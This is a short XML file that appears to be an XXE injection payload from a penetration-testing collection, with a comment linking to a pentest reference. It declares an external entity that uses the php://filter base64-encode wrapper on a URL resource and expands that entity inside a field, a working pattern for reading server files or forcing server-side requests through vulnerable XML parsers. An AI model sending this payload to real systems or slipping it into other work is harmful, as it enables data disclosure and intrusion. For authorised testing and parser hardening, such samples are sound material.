<?xml version="1.0"?>
<!-- Additional reference: https://pentestbook.six2dez.com/enumeration/web/xxe -->
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://example.com" >
]>
<entry>
  <field>&xxe;</field>
</entry>
